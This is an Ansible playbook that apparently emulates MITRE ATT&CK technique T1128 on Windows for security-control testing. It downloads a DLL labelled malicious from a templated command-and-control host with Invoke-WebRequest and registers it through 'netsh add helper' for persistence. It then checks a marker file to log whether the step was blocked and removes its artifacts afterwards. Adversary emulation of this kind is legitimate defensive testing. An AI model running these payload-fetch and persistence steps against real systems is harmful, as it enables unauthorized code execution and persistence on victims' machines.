#T1128 - Netsh Helper DLL
- name: Netsh Helper DLL - Windows
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: download malicious dll
      win_shell: Invoke-WebRequest -Uri http://{{ cnc_fqdn }}:{{ cnc_port }}/{{ cnc_dll }} -OutFile C:\temp\{{ cnc_dll }}
      register: command_result
      ignore_errors: yes
    - name: check download status
      debug: msg="Playbook Completed:T1128:failed:win:"
      when: "'Unable to connect' in command_result.stderr" 
    - name: execute malicious dll
      win_shell: |
        cd c:\temp
        netsh.exe add helper {{ cnc_dll }}
      ignore_errors: yes
      when: "'Unable to connect' not in command_result.stderr" 
    - name: Wait before status check
      wait_for: timeout=10
      delegate_to: localhost
    - name: check file exist
      win_stat:
        path: c:\temp\evil.txt
      register: T1128
    - name: check if playbook was blocked
      debug: msg="Playbook Completed:T1128:blocked:win:"
      when: ("'Unable to connect' not in command_result.stderr") and (T1128.stat.exists == False) 
    - name: check if playbook was successfull
      debug: msg="Playbook Completed:T1128:passed:win:" 
      when: (T1128.stat.exists) and ("'Unable to connect' not in command_result.stderr")
    - name: cleanup
      win_shell: |
        del C:\temp\{{ cnc_dll }}
        del C:\temp\evil.txt
        netsh.exe del helper {{ cnc_dll }}
      when: "'Unable to connect' not in command_result.stderr" 
